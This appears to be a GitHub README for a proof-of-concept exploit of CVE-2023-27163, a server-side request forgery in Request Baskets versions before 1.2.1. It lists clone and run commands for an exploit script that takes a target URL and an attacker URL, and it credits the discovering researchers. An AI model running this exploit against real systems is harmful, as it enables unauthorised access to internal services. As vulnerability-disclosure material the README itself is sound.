
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF PoC
alt text
Request Baskets versions <1.2.1 are vulnerable to Server Side Request Forgery (SSRF) attacks via the /api/baskets/{name} component.
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
Credit to @beet1e from Shanghai Jiao Tong University and @chenlibo147 , @houqinsheng, [email protected] from Shandong University. Article : https://notes.sjtu.edu.cn/s/MUUhEymt7#